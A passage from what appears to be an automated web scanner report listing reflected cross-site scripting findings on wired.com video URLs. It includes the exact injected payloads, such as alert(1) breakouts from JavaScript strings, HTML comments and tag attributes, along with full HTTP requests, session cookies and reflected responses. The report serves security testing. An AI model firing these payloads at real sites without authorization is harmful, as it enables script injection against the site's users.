Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:41:44 GMT
Date: Mon, 22 Nov 2010 00:36:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos6bdde"><a>8d08fc4d8e6 c_latest">
...[SNIP]...

1.1229. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8465"-alert(1)-"19aa27f8e45 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latestf8465"-alert(1)-"19aa27f8e45/1815816633/tron-legacy-clip-long-time/664849976001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:44:19 GMT
Date: Mon, 22 Nov 2010 00:39:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106774


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latestf8465"-alert(1)-"19aa27f8e45","latest-videos","1815816633","tron-legacy-clip-long-time","664849976001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1230. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 209d5"><a>004865321b8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latest209d5"><a>004865321b8/1815816633/tron-legacy-clip-long-time/664849976001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=278
Expires: Mon, 22 Nov 2010 00:42:48 GMT
Date: Mon, 22 Nov 2010 00:38:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106696


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latest209d5"><a>004865321b8">
...[SNIP]...

1.1231. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d784a"-alert(1)-"7f75e25cfd6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633d784a"-alert(1)-"7f75e25cfd6/tron-legacy-clip-long-time/664849976001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:44:33 GMT
Date: Mon, 22 Nov 2010 00:39:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","tron-legacy-clip-long-time","664849976001","1815816633d784a"-alert(1)-"7f75e25cfd6","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1232. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2288"-alert(1)-"25b0acd16bd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/tron-legacy-clip-long-timee2288"-alert(1)-"25b0acd16bd/664849976001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:44:58 GMT
Date: Mon, 22 Nov 2010 00:39:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106728


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","1815816633","tron-legacy-clip-long-timee2288"-alert(1)-"25b0acd16bd","664849976001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1233. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4594d"-alert(1)-"7690f3a7e1f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/6648499760014594d"-alert(1)-"7690f3a7e1f HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:45:10 GMT
Date: Mon, 22 Nov 2010 00:40:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","1815816633","tron-legacy-clip-long-time","6648499760014594d"-alert(1)-"7690f3a7e1f","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1234. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload e050c--><script>alert(1)</script>342fbb90a6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videoe050c--><script>alert(1)</script>342fbb90a6d/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29467
Vary: Accept-Encoding
Cache-Control: max-age=286
Expires: Mon, 22 Nov 2010 00:47:00 GMT
Date: Mon, 22 Nov 2010 00:42:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videoe050c--><script>alert(1)</script>342fbb90a6d/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001
-->
...[SNIP]...

1.1235. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb01f"><a>19896930279 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videocb01f"><a>19896930279/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29428
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:46:30 GMT
Date: Mon, 22 Nov 2010 00:41:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videocb01f"><a>19896930279 ss_latest-videos c_latest">
...[SNIP]...

1.1236. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3de52"><a>bb7b6c2ab13 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos3de52"><a>bb7b6c2ab13/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=278
Expires: Mon, 22 Nov 2010 00:46:54 GMT
Date: Mon, 22 Nov 2010 00:42:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106749


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos3de52"><a>bb7b6c2ab13 c_latest">
...[SNIP]...

1.1237. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8927"-alert(1)-"0b73e10bb0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videosa8927"-alert(1)-"0b73e10bb0b/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=293
Expires: Mon, 22 Nov 2010 00:48:08 GMT
Date: Mon, 22 Nov 2010 00:43:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "653193147001","tron-legacy-clip-quorra-saves-sam","latest","1815816633","latest-videosa8927"-alert(1)-"0b73e10bb0b","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1238. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a040"-alert(1)-"3f490dd9e9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest5a040"-alert(1)-"3f490dd9e9d/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=291
Expires: Mon, 22 Nov 2010 00:49:01 GMT
Date: Mon, 22 Nov 2010 00:44:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "653193147001","latest-videos","tron-legacy-clip-quorra-saves-sam","1815816633","latest5a040"-alert(1)-"3f490dd9e9d","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1239. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23bae"><a>bf20c8db554 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latest23bae"><a>bf20c8db554/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:48:17 GMT
Date: Mon, 22 Nov 2010 00:43:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latest23bae"><a>bf20c8db554">
...[SNIP]...

1.1240. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65d68"-alert(1)-"8f64e6fcf0e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/181581663365d68"-alert(1)-"8f64e6fcf0e/tron-legacy-clip-quorra-saves-sam/653193147001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:49:29 GMT
Date: Mon, 22 Nov 2010 00:44:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106780


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "653193147001","latest-videos","tron-legacy-clip-quorra-saves-sam","latest","181581663365d68"-alert(1)-"8f64e6fcf0e","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1241. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9277e"-alert(1)-"0623ce045a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam9277e"-alert(1)-"0623ce045a/653193147001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=286
Expires: Mon, 22 Nov 2010 00:49:46 GMT
Date: Mon, 22 Nov 2010 00:45:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106759


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

